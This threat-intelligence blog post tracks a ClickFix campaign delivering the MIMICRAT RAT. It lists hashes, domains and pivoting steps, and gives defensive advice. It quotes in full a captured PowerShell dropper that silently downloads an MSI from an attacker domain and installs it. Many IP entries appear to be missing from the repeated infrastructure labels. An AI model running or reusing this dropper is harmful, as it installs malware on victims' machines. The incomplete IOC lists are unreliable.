The Elastic Security Labs team recently published an insightful article about a “ClickFix” campaign, in which victims are encouraged to execute malicious actions themselves through copy-and-paste commands. This technique allows attackers to deliver a RAT known as MIMICRAT through multiple legitimate but compromised websites.
The Stormshield Customer Security Lab team observed that the campaign was still ongoing. Driven by our need to better understand the threat, we conducted additional investigations on March 3, 2026. These efforts enabled us to gather further information as well as additional Indicators of Compromise (IOCs).
The initial investigations
Elastic Security Labs’ initial report contains the following IOC linked to MIMICRAT:
bcc7a0e53ebc62c77b7b6e3585166bfd7164f65a8115e7c8bda568279ab4f6f1
Stage 1 PowerShell payload
5e0a30d8d91d5fd46da73f3e6555936233d870ac789ca7dd64c9d3cc74719f51
a508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b
055336daf2ac9d5bbc329fd52bb539085d00e2302fa75a0c7e9d52f540b28beb
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
d15mawx0xveem1.cloudfront[.]net
Thanks to the passive DNS resolution capabilities of the Validin tool applied to the IP addresses above, we obtained a long list of additional domains:
plugins-manager[.]network
www.connectmanager[.]network
www.plugins-manager[.]network
Several lessons can already be noted:
- Most of these records were registered in early January.
- The remaining ones were added later.
- Some were even registered on the day this report was written. It is therefore likely that additional domains may appear in the coming weeks.
- All of these domains were registered through the registrar NiceNIC.
The art of pivoting
IP 45.13.212[.]250
HTTP responses from the first payload delivery server (45.13.212[.]250) were not very useful.
The headers appear quite standard, but the returned data varies depending on the requested URL. This suggests that the server likely relies on virtual hosts to route requests. In any case, our requests only returned a blank page containing a short message such as “db error”, “wp db error”, “OK”, “sever error” (sic), or sometimes simply “NO”. None of these elements provided useful information that could be leveraged for further pivoting.
IP 45.13.212[.]251
We obtained more interesting results from the second server (45.13.212[.]251), which returned a blank page displaying the message “hosting is blocked.” Pivoting on this text revealed several additional IP addresses serving the same page. Such a pattern is relatively uncommon and provided a useful pivot for further analysis.
We were lucky because at the time of writing, these responses were being replaced with HTTP 403 “Access Forbidden” responses.
Additional IP retrieved:
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
By using the same DNS passive resolution, we get an impressive list of additional domains.
www.underfollowship[.]live
www.misselectionify[.]wiki
www.regularexpressions[.]re
By analyzing these domains, we observed the following:
- As previously highlighted by the IOCs identified by Elastic Security Labs, all of these domains were registered in early 2026 through the registrar NiceNIC.
- The certificate associated with the domain mispolishal[.]com was misconfigured and not valid for that website. The server was in fact presenting the certificate for avprog[.]cc. Attackers make mistakes sometimes.
- Using GoBuster, we identified several files and directories hosted on these domains.
- Some endpoints are fairly common, such as /js or /ps. However, others appear more interesting from an investigative perspective, including /cmd, /update, and similar paths.
We are seeing more and more similarities.
The domain msservice[.]network even owns a folder called /friend which downloads a powershell script:
$name = “ProgramData”;
$programData = (Get-Item “env:$name”).Value;
$inst = “FriendIstaller”;
$path = Join-Path $programData $inst;
New-Item -ItemType Directory -Path $path -Force | Out-Null;
$path = Join-Path $path “friend.msi”;
Start-BitsTransfer “https://msservice.network/friend.msi” “$path”;
Unblock-File $path;
Start-Process msiexec.exe -ArgumentList “/i `”$path`” /qn /norestart” -Wait
This PowerShell script silently downloads an MSI file named friend.msi into a subfolder of C:\ProgramData. At the time of our analysis, the MSI file was no longer available at the referenced location. As a result, we were unable to establish a direct link between this script and the broader campaign.
Additionally, the domain plugins-manager[.]network and the subdomain www.plugins-manager[.]network host dropper-style PowerShell scripts similar to those described by Elastic Security Labs.
IP 23.227.202[.]114
We then took a closer look at the C2 server used for post-infection activity (23.227.202[.]114). The HTTP response returns a simple webpage titled “CryptoBet Arena.” Pivoting on this title revealed following additional domains:
Both domains were registered in mid-January and resolve to an IP address belonging to a shared cloud hosting environment. When accessed, they return an HTTP page with the same content as the exploitation server. Based on these similarities, we assess that they are part of the attacker’s infrastructure.
Conclusion
Despite initial detection, attackers didn’t stop. We spotted new elements as part of their infrastructure, with more likely to appear soon. For the initially compromised websites, Elastic Security Labs has discovered a few, though many more likely exist. Stay vigilant.
How to answer
- Conduct regular cybersecurity awareness campaigns on phishing techniques in general, and on ClickFix in particular.
- Follow cybersecurity best practices: network segmentation, strict access control policies, frequent updates, and regular backups.
- On Stormshield Network Security firewalls, enable IPS on incoming and outgoing traffic, and activate filtering based on IP reputation.
Additional IOC spotted
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
plugins-manager[.]network
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
www.connectmanager[.]network
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
www.plugins-manager[.]network
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
www.underfollowship[.]live
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
www.regularexpressions[.]re
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
Payload delivery infrastructure
www.misselectionify[.]wiki
Payload delivery infrastructure
Payload delivery infrastructure
b3f35ad039855dcf6077aa1fdc95226e30d9b0d56ecce7df8813ac749d13adce
cf8e4b47e67e8ba5d580d92474d46b9aa49e6dbc7b306e805457e37fce7340ff
0a965688f7be1864efd1dedba14cc21756937208737b0eb30e9136c74f801f63
25e5531ea0678c1fad5a54363614e41f9eff0f58e3ced6d994583d07fbcf4001
3d88526b24cc62e7f59684bca45a17f9c477b05736d15329bb1c799327a7640a
453c92049c0d1db87d25cc44e986a4a78bbdb216e316008ec74ded0c0dc7b693
f8c8a1c1273661682c7da808bfdab4a13f469d7253e4b74a64802bf3954cc6c3
86fec08b6a514652a7abb3db63e641c6b2aa53e4867019beae297c6b71722e0d
8ee9b0242bd1e9731e7a0d8eb5770c2d935662b44e424dad4a77ab971e90a44e
ec2fe13f2cab9e62f19152aee657d2607f5c399beb55301e3db408543ad98693
09e762f6a5e75b48686382a2b43bcce5d4cdf395f62668ca8d1ba0ff8fc3e10e
e8a62f0a71a5d85a436ce3a37f9ed18167046521a991ea3d56b3df9b04a90ee5
518eedc1d34d2a04317d79a901a6e84a07030bf2651e6e2d3471ca304da58714
6b08f54c6cf8a858231f560a0950016290d715c410fd1864c92b4646351b79c4
82d43c4f2ef1305ff5d023d3ab720baf18107332a809cd1738e54053854d0b73
9633cbd68f6c8d36d332ec716808439396590abb43af9bd8f51aadc520f21013
9014529258e57cadd23df4380db88500887ff828f86807c8a274e309e7283842
7efe9fa6409a9a367bb46a64e6411b26c97d6be62f71f54aef20731c99a55559
dbd08af480c3a0f48ac0e951fec4edaa49b4154166a5c998c5de395d6d2321d6
cd3b136a6985fbbcc7cb29ce7352a0c365828b97d049098f8b2f0515aea54786
59a68e2744593a0df19defd29a42316ebf92cde67b74d8ed70d1495528019235
556aebbe03c496391a1b9bd9d89db0fa4e2bef00d1b83a5f9a4e5f803a311f6c
f2d096125de9c8be626b38bede8e6d487674b3326e8586f00b6d3df034be22a5
e92ec08658599ac94e6e51d1a8d6431a539a3c7078932f953749cd0ed65b09f4
38810a2c439b4e37f6e7f20e067b8aff5675f5f518583f4e308220e87297d4bb
569e990b1ee40842454f2bf2f52fa7159d572edb48587a27beb94635342b8346
809db7ef70cc5bc21c91760bc9a523b24a53a36a035d7d71172a4d9382b67bb6
26ba1918ddfe660da42e06ef868ac0f492e0d39c1b6ac69c709e6fcbcda8bf0d
cba89c41adddc57c2f852e6215de12c52ebf67afcef5e2d85d25597c7fff8b8d
fa5a6224c69ccb4610ad7f3eb911208c2560f225e8d17e27e83e540a5338f376
bc0d61e48a6731f4e20281b3c10607bc02800099f72acbe38bc79d1be14ebed3